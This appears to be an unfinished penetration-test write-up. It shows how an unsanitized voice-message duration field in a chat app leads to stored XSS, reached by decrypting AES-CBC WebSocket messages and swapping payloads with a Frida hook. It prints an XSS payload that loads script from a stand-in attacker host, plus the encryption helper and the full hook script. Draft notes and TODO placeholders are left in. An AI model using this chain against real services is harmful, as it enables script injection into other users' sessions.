notes

maybe mention it has also an app in the beggining, which mirros the web app?

Introduction

During an engagement, I found that the length of a voice message in a chat ended in an innerHTML sink. However, exploiting it turned out to be an adventure on itself, involving reverse engineering an implementation of AES encryption, hooking WebSocket traffic with Frida and simulating a physical device.

A simple innerHTML sink

This started the way a lot of findings do: staring at JavaScript and looking for something interesting.

This target had a lot of features, one of them being a chat. You could have two person chats or group chats, and if you enabled the option, anyone could join the group chats. While analyzing the client-side source code, more specifically at an innerHTML sink, I noticed that the time length of voice messages, meant to display the audio clip's duration, was rendered without sanitization. Good, but first of all, we need to understand if we can manipulate this field.

Something that I noticed after a while was that there was no option to send voice message anywhere. I was feeling confused. Until I noticed that, despite the interfaces being the same, if the app considered your device to be mobile, it displayed the voice message button. Ok, so there are various way we can work with this limitation, but for now we can just open devtools and click "Toggle device toolbar" to simulate a mobile phone.

Everything is Encrypted

It did not took much time to discover that chat interations were sent over WebSockets and encrypted. But encryption was probably done client-side, so I was really confident I could verify it. And so, after some time reverse engineering and reading JavaScript, I concluded that every interactions was AES-CBC encrypted with session-specific keys. Basically:

  • Key (x): dynamic key, unique per session
  • IV (y): initialization vector, also unique per session
  • Mode: AES-CBC with PKCS7 padding

This mean that, to understand what was happening and possibly inject my payload, I needed to:

  • Obtain the session's AES key and IV
  • Decrypt a valid message and understand the content
  • After that, modify the field I need
  • Enrypt it again
  • Replace a legitimate encrypted message with mine, or check if I can manually send a message

Understanding the Message Flow

Since we absolutely need to understand how messages, and specifically voice messages work, it was time for some combination of static analysis and runtime debugging! After a long while, I mapped out the following:

  1. User records voice message either in the app/mobile browser
  2. App uploads audio file, gets a URL
  3. App create JSON object with metadata, which including a duration field
  4. JSON is encrypted with session keys
  5. The encrypted payload is sent via WebSocket
  6. Server relays it to the recipient
  7. Recipient decrypts and renders, which includes the vulnerbale innerHTML

So, the encryption happened client-side and the server just relayed the encrypted blobbs. This meant that if I could intercept befor encryption or modify the encrypted output, I could inject anything.

Extracting Session Keys

Where do the AES keys come from? After more reverse engineering, I found they're exchanged during sessoin setup (seems simple, but took some time to put everything togehter):

  1. User creates or joins a group chat
  2. Attacker calls endpoint1 and servers returns value of variable1
  3. Attacker calls /endpoint2 with the variable1 value
  4. Server responds with key and IV

Now that I had the keys, it was time to decrypt the messages and check what was being sent over WebSockets

I created two functions to help me, one to encrypt payloads and other to decrypt. They looked like:

TODO: HERE SHOULD BE THE DECRYPT FUNCTION

import CryptoJS from 'crypto-js';

function aesEncrypt(plaintext, key, iv) {
    let keyBytes = CryptoJS.enc.Utf8.parse(key);
    let ivBytes = CryptoJS.enc.Utf8.parse(iv);
    let encrypted = CryptoJS.AES.encrypt(plaintext, keyBytes, {
        iv: ivBytes,
        mode: CryptoJS.mode.CBC,
        padding: CryptoJS.pad.Pkcs7
    });
    return encrypted.toString(); // Base64
}

const x = 'something'; // Session key
const y = 'somethingelse'; // Session IV

const payload = JSON.stringify({
    url: "...",
    messageId: "...",
    duration: "100</span><img src=x onerror=import('//ATTACKER.com')><span>",
    [ other fields ]
});

console.log(aesEncrypt(payload, x, y));

And the inverse to decrypt. // HERE SHOULD BE and the inverse to encrypt

Crafting the Payload

The original voice message decrypted JSON looked something like this:

{
    "url": "https://target.com/uploads/voicemessage123",
    "duration": "5",
    "messageId": "123456",
    [ other fields ]
}

Frida to the Rescue

Ok, we can get our payload into a message and encrypt it. But how to actually get it in to the WebSocket stream?

Intercepting WebSockets isnt as straightforward as HTTP using proxies like Burp or Caido. Additionally, this require an actual voice message being sent, so just sending our encrypted message in WebSockets wouldn't work. So, the target had a mobile app which was basically the same environment as the web interface. As such, I could create a frida script that intercepts the WebSocket layer and swaps the encrypted payload

So, that's essently what I did

Java.perform(function () {
   const RealWebSocket = Java.use("okhttp3.internal.ws.RealWebSocket");

   RealWebSocket.send.overload('java.lang.String').implementation = function (message) {
       console.log("[->] Original:", message);

       if (message.startsWith('42')) {
           try {
               let dataArray = JSON.parse(message.substring(2));
               const eventName = dataArray[0];

               if (eventName === 'q_send_im_msg_ts') {
                   let innerPayload = JSON.parse(dataArray[1]);

                   // Replace with our malicious encrypted payload
                   innerPayload.msgData = "JdAHG/Wvsmcj6dWerfH0VKMp...";

                   dataArray[1] = JSON.stringify(innerPayload);
                   const modified = "42" + JSON.stringify(dataArray);

                   console.log("[<-] Modified:", modified);
                   return this.send(modified);
               }
           } catch (e) {
               console.log("[!] Error:", e);
           }
       }
       return this.send(message);
   };
});

Now run it with `frida -U -f com.target.app -l hook.js,and when I record a voice message inside a chat, it will intercept it, swap the encrypted part with my XSS payload and send it. The server will accept it, relay to the victim and XSS fire!

Simulating physical device part

At this point I had a working XSS, but to create a public group chat, I had to...

I was too deep into this to just let it go. As such, initially I spent a lot of time diggin gthrough JavaScript and Java from the mobile app to understand how actually devices were registered. I finally managed to understand the http request needed for that but I was missing something: a real device id.

I had no way to have one, but I was determined. I spent a lot of time diggint thought user forums, setup guides, any kind of public discussion. And finally, in an obscure troubleshooting post, someone had shared their device ID while asking for help

Note: device ids are not sensitive, private or individual. They are just ask an id of the device model which is the same for every model

As such, with a device ID, I could now simulate a device connection. I registered a device to my test account, created a public group chat. Now the attack was complete